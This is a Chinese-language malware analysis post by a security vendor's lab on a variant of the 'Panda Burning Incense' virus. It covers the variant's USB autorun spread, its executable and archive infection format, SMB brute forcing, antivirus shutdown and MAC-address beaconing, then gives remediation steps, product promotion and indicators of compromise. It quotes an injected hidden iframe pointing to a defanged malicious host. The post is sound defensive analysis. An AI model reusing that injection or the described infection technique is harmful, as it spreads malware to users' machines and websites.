高龄病毒“熊猫烧香”还没退休?

2019-03-28 9,043

一、病毒概述

近日,深信服安全团队收到客户反馈,其内网多台主机中的文件感染了病毒,影响正常业务。经分析,该病毒为“熊猫烧香”病毒变种,虽然该病毒已有十余年历史,但由于其具有很强的感染及传播性,依然很容易在缺少防护的企业内网中传播开来。

病毒会对主机中的可执行文件、压缩文件以及网页文件进行感染,并可通过磁盘、局域网进行传播,同时具有对抗杀软的行为。

最早的“熊猫烧香”病毒中毒后被感染的可执行文件都会变成“熊猫烧香”的图标,这也是该病毒名称的来源。本次捕获的变种由于其在感染可执行文件时会提取原文件的图标并插入到被感染文件中,所以感染后图标不会变。

病毒主要行为如下:

image.png

 

二、详细分析

2.1 植入部分

病毒运行后首先会将自身复制到%SystemRoot%\System32\drivers\suchost.exe。

02.jpg 

运行suchost.exe然后退出。

03.jpg 

 

2.2 传播部分

[1] 磁盘传播

suchost.exe将自身复制到每个磁盘根目录下,命名为“   .exe”,同时在每个根目录下创建一个“autorun.inf”文件,文件属性为“只读”、“隐藏”、“系统”。

04.jpg 

05.jpg 

autorun.inf文件内容如下,功能为打开磁盘后自动运行病毒体“   .exe”,通过这种方式病毒可以通过U盘或者网络磁盘传播。微软在2011年发布的补丁包KB967940中对自动运行功能进行了限定,只支持CD/DVD媒体,所以打了补丁包或者win7以后的系统不会通过这种方式感染。

06.jpg 

运行磁盘根目录下的“   .exe”,会打开磁盘对应的目录,并关闭“我的电脑”窗口,后面的执行流程不变。

07.jpg 

[2] 文件感染

排除感染系统目录包括:

WINDOWS、WINNT、system32、Documents and Settings、System Volume Information、Recycled、Windows NT、WindowsUpdate、Windows Media Player、Outlook Express、Internet Explorer、NetMeeting、Common Files、ComPlus Applications、Messenger、InstallShield Installation Information、MSN、Microsoft Frontpage、Movie Maker、MSN Gamin Zone。

 

每感染一个文件夹,都会在其目录下创建一个Desktop_.ini记录感染日期。病毒在下次感染前会将当前的日期与记录的日期进行比较,如果相同则不再重复感染。

08.jpg 

病毒程序运行时,会判断其所在目录是否存在Desktop_.ini文件,如果存在的话就将其删除。

09.jpg 

排除感染NTDETECT.COM文件,然后通过文件后缀名确认感染目标,感染的文件类型主要分为三类:压缩文件、可执行文件和网页文件:RAR、ZIP、EXE、SCR、PIF、COM、htm、html、asp、php、jsp、aspx:

10.jpg 

 

在感染文件前先获取文件大小,超过某个值就不感染。压缩文件为20M,可执行文件与网页文件为10M。

11.jpg 

对于RAR、ZIP后缀的压缩文件,会执行winrar命令将其解压缩到C:\MyRARwork文件夹,感染其中的文件后再压缩回原目录。

12.jpg 

对于EXE、SCR、PIF、COM后缀的可执行文件,首先判断其是否包含字符串“BMW!!”,是的话则不执行感染。

13.jpg 

提取原文件的图标,将其临时保存到%Temp%目录。

14.jpg 

复制病毒文件覆盖被感染文件。

15.jpg 

将图标文件除写入病毒文件,使得被感染的文件图标不变,随后删除图标文件。

16.jpg 

随后将被感染的原文件添加到病毒文件后面,并在尾部写入标志。

17.jpg 

可执行文件被感染后的结构为:病毒文件(替换了图标)+原文件+0x00+”BMW!!”+原文件名+”.exe”+0x02+原文件大小+0x01。

被感染的可执行文件尾部如下:

18.jpg 

运行被感染的文件,会将原文件释放出来,命名为“原文件名+.exe”。

19.jpg 

 

在Temp目录下创建bat脚本并运行, 在Temp目录下创建bat脚本并运行,bat脚本用于删除被感染的文件并将释放的“原文件名+.exe”重命名为原文件名,内容如下:

21.jpg 

对于htm、html、asp、php、jsp、aspx后缀的网页文件的感染,是将恶意链接”<iframe src="hxxp://www.9z9t.com/htmmm/mm.htm" width=0 height=0></iframe>”\”解密后插入到文件末尾。

22.jpg 

[3] 局域网传播

对139、445端口进行暴破传播:

23.jpg 

2.3 恶意行为部分

停止或卸载杀毒软件:

24.jpg 

访问如下网页获取恶意程序下载链接,下载恶意程序并运行:

25.jpg 

添加开机自启动项并禁止显示隐藏文件:

26.jpg 

关闭网络共享:

27.jpg 

将默认浏览器设置为IE,然后将本机mac作为参数访问链接”hxxp://www.daohang08.com/down/tj/mac.asp?mac=”,用于统计中毒主机信息。

28.jpg 

 

三、解决方案

病毒检测查杀

1、深信服为广大用户免费提供查杀工具,可下载如下工具,进行检测查杀。

64位系统下载链接:

http://edr.sangfor.com.cn/tool/SfabAntiBot_X64.7z

32位系统下载链接:

http://edr.sangfor.com.cn/tool/SfabAntiBot_X86.7z

 

2、深信服EDR产品、下一代防火墙及安全感知平台等安全产品均具备病毒检测能力,部署相关产品用户可进行病毒检测,如图所示:

29.jpg 

 

病毒防御

1、及时给电脑打补丁,修复漏洞。

2、对重要的数据文件定期进行非本地备份。

3、不要点击来源不明的邮件附件,不从不明网站下载软件。

4、尽量关闭不必要的文件共享权限。

5、更改账户密码,设置强密码,避免使用统一的密码,因为统一的密码会导致一台被攻破,多台遭殃。

6、如果业务上无需使用RDP的,建议关闭RDP。当出现此类事件时,推荐使用深信服防火墙,或者终端检测响应平台(EDR)的微隔离功能对3389等端口进行封堵,防止扩散!

7、深信服防火墙、终端检测响应平台(EDR)均有防爆破功能,防火墙开启此功能并启用11080051、11080027、11080016规则,EDR开启防爆破功能可进行防御。

8、深信服防火墙客户,建议升级到AF805版本,并开启人工智能引擎Save,以达到最好的防御效果。

9、使用深信服安全产品,接入安全云脑,使用云查服务可以即时检测防御新威胁。

 

最后,建议企业对全网进行一次安全检查和杀毒扫描,加强防护工作。推荐使用深信服安全感知+防火墙+EDR,对内网进行感知、查杀和防护。

 

 

四、IOC

MD5:

AE8E8289B688497A672FE90D8A0AAE3F

URL:

hxxp://www.9z9t.com/htmmm/mm.htm

hxxp://www.9z9t.com/down1.txt

hxxp://www.daohang08.com/down/houmendown.txt

hxxp://www.daohang08.com/down/tj/mac.asp?mac=


本文作者:Further_eye

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/102537.html

Tags:
评论  (0)
快来写下你的想法吧!

Further_eye

文章数:227 积分: 1855

深信服科技旗下安全实验室,致力于网络安全攻防技术的研究和积累,深度洞察未知网络安全威胁,解读前沿安全技术。

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号